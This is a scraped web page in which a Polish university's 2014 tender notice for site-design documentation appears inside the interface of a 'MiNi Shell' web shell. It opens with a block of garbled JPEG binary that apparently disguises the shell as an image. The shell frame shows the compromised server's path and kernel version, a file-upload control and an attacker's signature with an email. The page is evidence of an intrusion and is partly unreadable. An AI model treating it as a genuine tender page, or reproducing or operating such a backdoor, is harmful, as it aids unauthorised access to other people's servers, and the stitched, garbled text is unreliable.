JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140110/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140110/11002-N-2014.html

<p class="kh_header"><b>Białystok: AZP/261/U/1/TIN/SRM-216/ODA/8/2014 - Opracowanie dokumentacji projektowej dotyczącej zagospodarowania terenu wokół budynku Centrum Badań Innowacyjnych w Białymstoku przy ul. Waszyngtona róg ul. Wojskowej wraz ze złożeniem wniosku o wydanie decyzji o pozwoleniu na budowę i sprawowaniem nadzoru autorskiego</b><br>
<b>Numer ogłoszenia: 11002 - 2014; data zamieszczenia: 10.01.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uniwersytet Medyczny w Białymstoku , ul. Jana Kilińskiego 1, 15-089 Białystok, woj. podlaskie, tel. 085 7485400, faks 085 7485627.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.umb.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> AZP/261/U/1/TIN/SRM-216/ODA/8/2014 - Opracowanie dokumentacji projektowej dotyczącej zagospodarowania terenu wokół budynku Centrum Badań Innowacyjnych w Białymstoku przy ul. Waszyngtona róg ul. Wojskowej wraz ze złożeniem wniosku o wydanie decyzji o pozwoleniu na budowę i sprawowaniem nadzoru autorskiego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1)	Przedmiotem zamówienia jest opracowanie dokumentacji projektowej dotyczącej zagospodarowania terenu wokół budynku Centrum Badań Innowacyjnych w Białymstoku przy ul. Waszyngtona róg ul. Wojskowej wraz ze złożeniem wniosku o wydanie decyzji 
o pozwoleniu na budowę i sprawowaniem nadzoru autorskiego:
CZĘŚĆ I - dokumentacja projektowa wraz z nadzorem autorskim, finansowana w ramach Programu Operacyjnego Rozwój Polski Wschodniej 2007-2013, Oś priorytetowa Nowoczesna Gospodarka, Działanie 1.3 Wspieranie Innowacji, tytuł projektu Ośrodek do analiz zagrożeń cywilizacyjnych lub środowiskowych i sposobów przeciwdziałania, 
obejmująca:
Zadanie 1 - Ogrodzenie terenu
Zadanie 2 - Zagospodarowanie terenu patio
Zadanie 3A - Kanalizacja deszczowa w zakresie głównego leżaka

CZEŚĆ II - dokumentacja projektowa wraz z nadzorem autorskim finansowana w ramach środków własnych Uniwersytetu Medycznego w Białymstoku, poza Projektem PO RPW, obejmująca:
Zadanie 3B - Kanalizacja sanitarna i deszczowa w zakresie wymiany przykanalików.

Przedmiot zamówienia obejmuje uzyskanie wymaganych opinii, uzgodnień, ekspertyz technicznych i sprawdzeń rozwiązań projektowych w zakresie wynikającym z przepisów, niezbędnych do uzyskania pozwolenia na wykonanie przedmiotu zamówienia (lub zgłoszenia robót) oraz sprawowanie nadzoru autorskiego.
2)	Przed rozpoczęciem prac projektowych Wykonawca zobowiązany jest wykonać wielobranżową inwentaryzację terenu objętego zakresem opracowania wraz z inwentaryzacją sieci podziemnych 
i inwentaryzacją zieleni, niezbędne badania geologiczne, uzyskać mapę do celów projektowych, na własny koszt.
3) Dokumentacja projektowo - kosztorysowa powinna obejmować swym zakresem 
w szczególności:
3.1) Projekt koncepcyjny (przed przystąpieniem do dalszych prac projektowych Projekt koncepcyjny należy uzgodnić z Zamawiającym)
3.2) Projekt budowlany do pozwolenia na budowę, zgodnie z obowiązującymi przepisami lub opracowanie niezbędne go zgłoszenia robót budowlanych.
3.3) W branży budowlanej/drogowej
-	Projekt wykonawczy architektoniczny
-	Projekt zagospodarowania terenu
-	Projekt drogowy
-	Projekt zieleni
3.4) W branży sanitarnej
-	Projekt wykonawczy wymiany sieci kanalizacji sanitarnej i deszczowej
-	Projekt odwodnienia terenu patio
3.5) W branży elektrycznej
-	Projekt instalacji elektrycznych wewnętrznych i zewnętrznych
3.6) W branży teletechnicznej
-	Projekt instalacji teletechnicznych wewnętrznych i zewnętrznych
3.7) Specyfikacje Techniczne Wykonania i Odbioru Robót Budowlanych wszystkich branż
3.8)Przedmiary robót dla wszystkich branż z uwzględnieniem odniesienia do specyfikacji technicznych wykonania i odbioru robót budowlanych oraz kodów CPV
3.9) Kosztorysy inwestorskie wg branż i zakresów wraz z kodami CPV
3.10) Zbiorcze zestawienie kosztorysów
UWAGA!
W uwagi na różne źródła finansowania, w ramach Zadania nr 3 należy opracować przedmiary 
i kosztorysy z podziałem na części:
-	Zadanie 3A  winno obejmować wymianę sieci kanalizacji deszczowej, odwodnienie terenu patio, roboty ziemne i odtworzenie istniejącej nawierzchni
-	Zadanie 3B winno obejmować wymianę przykanalików sieci kanalizacji sanitarnej 
i deszczowej, roboty ziemne i odtworzenie istniejącej nawierzchni.
Elementy niewykazane w powyższym zestawieniu, a konieczne do zrealizowania przedmiotu zamówienia w sposób prawidłowy, zgodnie z umową należy wykonać w ramach zadania.
4) Dokumentacja projektowa w wersji papierowej powinna być opracowana w ilościach przedstawionych poniżej:
a) Projekt koncepcyjny - 1 egzemplarz
b) Projekt budowlany - 5 egzemplarzy lub opracowanie niezbędne do zgłoszenia
robót - 2 egzemplarze
c) Projekty wykonawcze branżowe - po 4 egzemplarze
d) Specyfikacje Techniczne Wykonania i odbioru robót - po 4 egzemplarze
e) Przedmiary robót branżowych - po 4 egzemplarze
f) Kosztorysy inwestorskie po 2 egzemplarze
g) Zbiorcze zestawienia kosztorysów - 2 egzemplarze

Do opracowania należy dołączyć elektroniczną wersję dokumentacji projektowej, na nośniku CD, 
w formacie: *PDF - 1 egz., *dwg - 1 egz., dokumentacji przedmiarowo - kosztorysowej w formacie *ath - 1 egz. i *PDF - 1 egz. (na oddzielnym nośniku). Wielkość poszczególnych plików nie może przekraczać 15MB. Dokumentację w wersji elektronicznej należy pogrupować w folderach 
i podfolderach zgodnie z wersją papierową.

5) Szczegółowy opis przedmiotu zamówienia zawarty jest w Załączniku nr 8 do SIWZ 
i pozostałych Załącznikach do SIWZ (część rysunkowa, opisy).
6) Zasady realizacji nadzoru autorskiego:
6.1)	wykonawca dokumentacji projektowej zapewni pełnienie nadzoru autorskiego przez uprawnionych projektantów we wszystkich branżach, zgodnie z wymogami prawa budowlanego.
6.2) pełnienie nadzoru autorskiego upływa w dniu podpisania protokołu odbioru końcowego robót budowlano - montażowych.
6.3)	liczba pobytów Wykonawcy na budowie w ramach nadzoru autorskiego, wynikać będzie 
z uzasadnionych potrzeb, określonych każdorazowo przez ZAMAWIAJĄCEGO lub występującego w jego imieniu Inspektora Nadzoru.
6.4) pełne wymagania dotyczące sprawowania nadzoru autorskiego zostały określone we wzorze umowy -  Załącznik nr 7 do SIWZ..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 71.24.80.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 90.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W niniejszym postępowaniu nie jest wymagane wniesienie wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełniania warunku Wykonawca winien wykazać że w okresie ostatnich trzech lat, przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy -  w tym okresie - wykonał co najmniej 1 usługę w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia, odpowiadającą swoim zakresem i złożonością usłudze stanowiącej przedmiot zamówienia (wykonanie projektu wykonawczego, wielobranżowego na zagospodarowanie terenu o powierzchni nie mniejszej niż 500 m2 ), z podaniem przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane wraz z załączeniem dowodów czy zostały wykonane należycie; 
Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana wg formuły: spełnia - nie spełnia  w oparciu o informacje zawarte w wymaganych w SIWZ dokumentach. Z treści załączonych dokumentów musi wynikać jednoznacznie,  że w/w warunki Wykonawca spełnił.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Dokumenty pozostałe:
1.wypełniony formularz ofertowy - wg załącznika nr 1 do SIWZ;
2.kalkulacja ceny ofertowej - wg załącznika nr 1A do SIWZ;
3.wykaz części zamówienia, których wykonanie Wykonawca zamierza powierzyć podwykonawcom (jeżeli są przewidywani) - wg załącznika nr 4 do SIWZ;
4.oświadczenie o odbyciu wizji lokalnej - wg załącznika nr 6 do SIWZ;
5.pełnomocnictwo do podpisywania oferty i składania ewentualnych wyjaśnień, jeżeli osobą podpisującą nie jest osoba upoważniona na podstawie dokumentu wymienionego w ust. 2) pkt 2.2 - w oryginale lub poświadczone notarialnie.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Wszelkie zmiany niniejszej umowy wymagają formy pisemnej pod rygorem nieważności i będą dopuszczalne w granicach unormowania artykułu 144 ustawy Prawo zamówień publicznych. 
2.Zmiana umowy możliwa jest w sytuacji, gdy:
a.	jest korzystna dla ZAMAWIAJĄCEGO,
b.	konieczność zmiany wynika z okoliczności, których nie dało się przewidzieć w dacie zawarcia umowy, 
c.	zmieniły się przepisy, których regulacje wpływają na prawa i obowiązki stron, 
d.	istnieje konieczność przesunięcia terminu wykonania prac, z przyczyn leżących po stronie ZAMAWIAJĄCEGO.
3.Ustalone umową terminy mogą ulec wydłużeniu o czas opóźnienia, jeżeli takie opóźnienie jest lub będzie miało wpływ na wykonanie przedmiotu umowy w następujących przypadkach:
a.	wystąpienia konieczności wykonania dodatkowych i niemożliwych do przewidzenia prac, których zrealizowanie jest niezbędne, z uwagi na zmianę obowiązujących przepisów, 
a których  przeprowadzenie  wiąże się z potrzebą zmiany terminu,
b.	jakiegokolwiek opóźnienia, utrudnienia lub przeszkód spowodowanych lub dających się przypisać ZAMAWIAJĄCEMU,
c.	siły wyższej,
d.	na skutek działań osób trzecich uniemożliwiających wykonanie prac, które to działania nie są konsekwencją winy którejkolwiek ze stron,
e.	wystąpienie innych szczególnych okoliczności, za które WYKONAWCA nie jest odpowiedzialny. 
4.O wystąpieniu okoliczności mogących wpłynąć na zmianę terminów, WYKONAWCA winien jest poinformować ZAMAWIAJĄCEGO  na piśmie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.umb.edu.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dział Zamówień Publicznych (lewe skrzydło Pałacu Branickich, I piętro)
ul. Jana Kilińskiego 1, 15-089 Białystok.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.01.2014 godzina 10:00, miejsce: Kancelaria Ogólna UMB (lewe skrzydło Pałacu Branickich, parter)
ul. Jana Kilińskiego 1, 15-089 Białystok.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1)Prace projektowe wraz z nadzorem autorskim, w zakresie ogrodzenia terenu (zadanie 1), zagospodarowania terenu patio (zadanie 2) i wymiany leżaka kanalizacji deszczowej (w zakresie zadania 3a - Kanalizacja  deszczowa), stanowiące przedmiot zamówienia - finansowane są 
w ramach Programu Operacyjnego Rozwój Polski Wschodniej 2007-2013, Oś priorytetowa I Nowoczesna gospodarka, Działania 1.3 Wspieranie Innowacji, tytuł projektu Ośrodek do analiz zagrożeń cywilizacyjnych lub środowiskowych i sposobów przeciwdziałania.
2)Prace projektowe wraz z nadzorem autorskim, w zakresie wymiany przykanalików kanalizacji sanitarnej i deszczowej (w zakresie zadania 3b - Kanalizacja sanitarna i deszczowa), stanowiące przedmiot zamówienia - finansowanie są w ramach środków własnych Uniwersytetu Medycznego w Białymstoku, poza Projektem PORPW, Działanie I.3. 
3) 1)	Wymagane terminy realizacji zadania: 
a)	termin opracowania kompletnej dokumentacji projektowo - kosztorysowej i przekazanie jej Zamawiającemu wraz ze  złożeniem wniosku o wydanie decyzji o pozwoleniu na budowę - do 90 dni od daty zawarcia umowy,
b)	termin sprawowania nadzoru autorskiego upływa w dniu podpisania protokołu  końcowego odbioru robót budowlanych. Planowany termin pełnienia nadzoru autorskiego: II kwartał 2014 r. - III kwartał 2014 r..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com